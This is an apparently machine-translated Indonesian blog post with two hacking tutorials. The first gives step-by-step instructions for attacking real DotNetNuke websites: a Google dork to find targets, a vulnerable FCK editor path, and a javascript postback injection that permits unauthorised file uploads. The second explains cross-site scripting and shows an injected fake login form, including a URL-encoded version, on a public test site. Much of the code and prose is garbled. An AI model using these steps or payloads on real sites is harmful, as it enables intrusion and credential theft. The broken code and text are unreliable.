DNN (DotNetNuke) Website Hacking – Tutorial


Sangat mudah dibandingkan dengan serangan hacking lain seperti SQL Injection dan Cross Site Scripting.

DotNetNuke adalah sebuah platform open source untuk membangun situs web berbasis teknologi Microsoft NET.. DotNetNuke terutama menyediakan Content Management System (CMS) untuk website pribadi.

Berikut adalah langkah mudah untuk menerapkan serangan itu:

• Pertama menggunakan dork google untuk mencari sasaran yang tepat.

inurl: "/ portal / 0? site:. com

• Anda dapat mengubah com untuk nama domain yang Anda inginkan seperti ph ae bd
• Sekarang pencari situs Web Anda di google setelah mencari Anda akan mendapatkan banyak website memilih salah satu itu.

• waktunya untuk memeriksa kerentanan yang diperlukan di website hanya menempatkan kode ini setelah alamat web.

Penyedia / HtmlEditorProviders / FCK / fcklinkgallery.aspx

• Sebagai contoh jika Anda punya www.victim.com
• Gantikan www.victim.com / Penyedia / HtmlEditorProviders / FCK / fcklinkgallery.aspx
• Jika Anda akan mendapatkan layar ini berarti web ini akan hack.

300x279 dnn1 DNN (DotNetNuke) Website Tutorial Hacking

• Sekarang memilih pilihan ketiga "Sebuah File Pada Situs Anda" Dan dari paste kode java pada address bar anda.

javascript: __doPostBack ('ctlURL $ cmdUpload', ")

• Ini akan memungkinkan Anda untuk meng-upload file pada website ini anda dapat mengupload teks ~ ~ swf jpg gif ~ ~ ~ File pdf.

• Setelah meng-upload file Anda dapat menemukan file Anda pada alamat www.victim.com/portals/0/yourfile.extension

disini ekstensi jpg txt swf dll

• Dalam kasus kami

www.victim.com/portals/0/b.txt

===================================================

Cross Site Scripting – XSS – Tutorial


Cross Site Scripting - XSS -  Exploit

1. Apakah Cross Site Scripting?

Cross Site Scripting (atau XSS) adalah salah satu serangan aplikasi-lapisan yang paling umum web. XSS biasanya target script tertanam di halaman yang dijalankan pada sisi-klien (di web browser pengguna) daripada pada sisi-server. XSS sendiri adalah sebuah ancaman yang disebabkan oleh kelemahan keamanan internet bahasa script sisi klien, dengan HTML dan JavaScript (lainnya adalah VBScript, ActiveX, HTML, atau Flash) sebagai penyebab utama untuk mengeksploitasi. Konsep XSS adalah untuk memanipulasi script sisi klien-aplikasi web untuk mengeksekusi dengan cara yang diinginkan oleh pengguna jahat. Seperti manipulasi bisa menanamkan script di halaman yang dapat dijalankan setiap kali halaman di-load, atau kapan sebuah peristiwa yang terkait dilakukan.

Contoh dasar XSS adalah ketika pengguna menyuntikkan berbahaya naskah dalam URL situs belanja yang sah yang pada gilirannya redirect pengguna ke halaman palsu tetapi identik. Halaman jahat akan menjalankan script untuk menangkap cookie dari browsing pengguna situs belanja, dan cookie yang mendapat dikirim ke pengguna jahat yang sekarang dapat membajak sesi pengguna yang sah itu. Meskipun tidak nyata hack telah dilakukan terhadap situs belanja, XSS masih memanfaatkan kelemahan scripting di halaman untuk menjerat pengguna dan mengambil alih komando sesi nya. Sebuah trik yang sering digunakan untuk membuat URL berbahaya kurang jelas adalah memiliki bagian XSS dari URL dikodekan dalam HEX (atau metode encoding lainnya). Hal ini akan terlihat tidak berbahaya bagi pengguna yang mengenali URL ia kenal, dan hanya mengabaikan dan mengikuti kode 'diakali' yang akan dikodekan dan karena itu tidak mencolok.

2. pemilik situs selalu percaya diri, tapi begitu juga hacker!

Tanpa masuk ke rincian teknis yang rumit, seseorang harus menyadari berbagai kasus yang telah menunjukkan bahwa XSS dapat memiliki konsekuensi serius ketika dieksploitasi pada aplikasi web yang rentan. Banyak pemilik situs memberhentikan XSS dengan alasan bahwa hal itu tidak dapat digunakan untuk mencuri data sensitif dari database back-end. Ini merupakan kesalahan umum karena konsekuensi dari XSS terhadap aplikasi web dan pelanggannya telah terbukti sangat serius, baik dalam hal fungsionalitas aplikasi dan operasi bisnis. Sebuah proyek bisnis online tidak mampu kehilangan kepercayaan dari pelanggan sekarang dan masa depan hanya karena tak seorang pun pernah melangkah maju untuk membuktikan bahwa situs mereka benar-benar rentan terhadap eksploitasi XSS. Ironisnya, ada cerita dari pemilik situs yang telah berani menyatakan bahwa XSS tidak benar-benar risiko-tinggi mengeksploitasi. Hal ini sering mengakibatkan tantangan publik yang hacker selalu gatal untuk menerima, dengan pemilik situs harus kemudian berurusan dengan aplikasi dirusak dan malu publik.

3. Dampak dari XSS

Analisis kasus yang berbeda yang detail XSS memanfaatkan mengajarkan kita bagaimana teknologi web yang terus berubah adalah tempat dekat untuk membuat aplikasi lebih aman. Sebuah pencarian web secara menyeluruh akan mengungkapkan banyak cerita situs perusahaan skala besar web menjadi hacked melalui eksploitasi XSS, dan laporan kasus seperti itu selalu menunjukkan konsekuensi yang sama berulang sebagai jenis parah.

Exploited XSS biasanya digunakan untuk mencapai hasil yang berbahaya sebagai berikut:

* Identitas pencurian
* Mengakses informasi sensitif atau dibatasi
* Mendapatkan akses gratis ke sebaliknya dibayar untuk konten
* Mengintip kebiasaan browsing pengguna web
* Mengubah fungsionalitas browser
* Umum fitnah dari seorang individu atau korporasi
* Perusakan aplikasi Web
* Denial of Service serangan

Setiap pemilik situs dengan tingkat integritas yang sehat akan setuju bahwa di atas tidak benar-benar dapat dianggap kita dampak sembrono atau tidak penting di situs rentan. kekurangan Keamanan di situs web profil tinggi telah memungkinkan hacker untuk memperoleh informasi kartu kredit dan informasi pengguna yang memungkinkan mereka untuk melakukan transaksi atas nama mereka. pengguna yang sah telah sering tertipu untuk mengklik link yang mengarahkan mereka ke halaman berbahaya tapi tampak sah yang pada gilirannya mereka menangkap semua rincian dan mengirimkannya langsung ke hacker. Contoh ini mungkin tidak terdengar seburuk hacking ke database perusahaan, namun tidak mengambil upaya untuk menyebabkan pengunjung situs atau pelanggan kehilangan kepercayaan pada keamanan aplikasi yang pada gilirannya dapat mengakibatkan kewajiban dan hilangnya bisnis.

4. Sebuah contoh praktis dari XSS di situs tes Acunetix.

Contoh berikut bukan hacking tutorial. Ini adalah cara dasar untuk menunjukkan bagaimana XSS dapat digunakan untuk mengontrol dan mengubah fungsionalitas dari suatu halaman web dan desain ulang halaman cara proses output-nya. Penggunaan praktis contoh dapat bebas diperdebatkan, namun siapa pun dapat melihat laporan berkala yang menggambarkan bagaimana XSS canggih digunakan untuk mencapai hasil yang sangat kompleks, paling sering tanpa diketahui oleh pengguna. Saya mendorong juga orang-orang yang tidak memiliki pengetahuan hacking untuk mencoba contoh berikut, saya yakin Anda akan menemukan menarik.

1. Muat link berikut di browser Anda:

http://testasp.vulnweb.com/Search.asp

Anda akan melihat bahwa halaman tersebut adalah halaman sederhana dengan sebuah field input untuk menjalankan pencarian

xss Site 1 Cross Scripting XSS Tutorial

2. Cobalah untuk memasukkan kode berikut ke dalam kolom pencarian, dan perhatikan bagaimana bentuk login akan ditampilkan pada halaman:

Silahkan login dengan form di bawah ini sebelum melanjutkan:

Kode:

<br> Silahkan login dengan form di bawah ini sebelum melanjutkan: <form action="destination.asp"> <table> <tr> <td> Login: panjang text = </ td> <td> <input type = 20 name = <> login / td> </ tr> <tr> <td> Password: / <td> <td> type=text <input length=20 name=password> </ td> </ tr> </ table> <input type=submit value=LOGIN> </ form>

maka cukup tekan tombol cari setelah memasukkan kode.

xss 2 Cross Site Scripting XSS Tutorial Melalui cacat XSS pada halaman, ini telah memungkinkan untuk membuat form login palsu yang dapat meyakinkan mengumpulkan mandat pengguna. Seperti yang terlihat pada langkah 2, kode tersebut mengandung bagian yang menyebutkan "destination.asp". Itu adalah di mana seorang hacker dapat menentukan mana form login palsu akan mengirim pengguna log-in detail bagi mereka yang akan diambil dan digunakan jahat.

Seorang hacker juga dapat menyuntikkan kode ini dengan mengedarkannya melalui address bar browser sebagai berikut:
Kode:

http://testasp.vulnweb.com/Search.asp?tfSearch =% 3Cbr% 3E% 3Cbr% 3EPlease + login + dengan + para + formulir + bawah + sebelum + melanjutkan% 3A% 3C bentuk + aksi% 3D 22test%. asp% 22%% 3Ctable 3E% 3E% 3Ctr% 3E% 3Ctd% 3ELogin% 3A% 3C% 2Ftd% 3E% 3Ctd% 3Cinput 3E% + 3Dtext tipe% + panjang% 3D20 + name%% 3Dlogin 3E% 3C% 2Ftd% 3E % 3C% 3E% 2Ftr% 3Ctr% 3E% 3Ctd% 3EPassword% 3A% 3C% 3E% 2Ftd% 3Ctd% 3E% 3Cinput + tipe% 3Dtext + panjang% 3D20 + name% 3Dpassword% 3E% 3C% 3E% 2Ftd% 3C % 2Ftr% 3E%% 2Ftable 3C% 3E 3Cinput% + tipe% 3Dsubmit + nilai% 3DLOGIN% 3E% 3E% 2Fform 3C%

xss Situs 3 Cross Scripting XSS Tutorial

Hal ini akan menciptakan hasil yang sama pada halaman, yang menunjukkan bagaimana XSS dapat digunakan dalam beberapa cara berbeda untuk mencapai hasil yang sama. Setelah hacker mengambil pengguna log-in kredensial, ia dapat dengan mudah menyebabkan browser untuk menampilkan halaman pencarian seperti yang awalnya dan pengguna bahkan tidak menyadari bahwa dia baru saja tertipu. Contoh ini juga dapat dilihat digunakan di semua email spam kita semua terima. Hal ini sangat umum untuk menemukan email di kotak masuk Anda mengatakan bagaimana sebuah situs lelang tertentu mencurigai bahwa individu lain menggunakan akun Anda jahat, dan kemudian meminta Anda untuk mengklik link untuk memvalidasi identitas Anda. Ini adalah metode serupa yang mengarahkan pengguna yang tidak menaruh curiga ke versi FAKE dari situs lelang, dan menangkap pengguna log-in kredensial untuk kemudian mengirimkannya ke hacker.

5. Mengapa menunggu untuk di-hack?

Pengamatan yang dapat dibuat ketika cerita-cerita baru dari hacks terbaru yang dipublikasikan adalah bahwa situs yang dimiliki oleh merek besar dan korporasi hacked dengan cara yang persis sama dengan situs-situs yang dimiliki oleh bisnis dengan anggaran yang jauh lebih kecil. Ini jelas menunjukkan bagaimana kurangnya keamanan bukanlah masalah sumber daya, tetapi secara langsung tergantung pada kurangnya kesadaran di kalangan bisnis dari ukuran semua. Secara statistik, 42% dari aplikasi web yang meminta audit keamanan rentan terhadap XSS, yang jelas paling tinggi berulang-risiko mengeksploitasi antara semua aplikasi yang diuji. Upaya untuk meningkatkan kesadaran tentang betapa mudahnya bagi seorang hacker ahli untuk mengeksploitasi aplikasi rentan sepertinya tidak akan terjadi terlalu jauh. Hal ini masih sangat umum untuk melihat "Kita akan melihat bila saya mendapatkan hacked" mentalitas masih tersisa di antara pemilik situs yang akhirnya risiko kehilangan banyak uang dan juga kepercayaan dari pelanggan mereka. Siapa saja dengan bunga yang penelitian hal ini akan melihat bagaimana bahkan individu yang mengaku menjadi ahli keamanan merasa nyaman untuk menyatakan bahwa XSS adalah over-rated dan tidak dapat benar-benar digunakan untuk mencapai hasil yang serius pada aplikasi web. Namun penelitian lebih lanjut juga akan membuktikan bahwa angka-angka statistik berbicara untuk diri mereka sendiri, dan orang-orang statistik yang sama terus bertumbuh dengan laju yang pada akhirnya akan mendung klaim dari mereka "ahli" percaya.